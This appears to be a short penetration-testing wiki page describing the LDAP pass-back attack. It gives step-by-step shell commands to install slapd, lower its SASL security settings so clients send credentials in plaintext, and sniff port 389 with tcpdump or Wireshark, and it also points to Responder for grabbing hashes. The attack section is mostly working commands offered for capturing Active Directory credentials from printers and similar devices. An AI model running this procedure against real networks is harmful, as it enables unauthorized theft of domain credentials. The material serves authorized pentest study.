Rogue LDAP Servers

LDAP authentication is a popular mechanism with third-party (non-Microsoft) applications that integrate with AD.

You can also just grab the hash with Responder... Pretty easy.

https://hacklido.com/blog/282-ldap-pass-back-attack-a-old-printers-story

https://www.devilsec.io/2019/04/29/hacking-printers-for-profit/

sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd # Configure the LDAP Server
#For the DNS domain name and Organization nameyou want use the target domain name. 
#You can use any password. 
# Select MBD database.
# Do not remove database when slapd is purged.
# Move old database, Yes.

#Make a file named olcSaslSecProps.ldif with the following content. 
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

#Patch LDAP server
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

#Check config. This did not work for me it always only showed dn: 
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

# You should now be able to listen for the traffic to come through in plain text with wireshark. 

#Or you can use tcp dump to listen
sudo tcpdump -SX -i $interface tcp port 389

# Disable the server when you're done. 
sudo systemctl disable --now slapd

Previouswwwtree NextWpscan

Last updated 2 years ago

Was this helpful?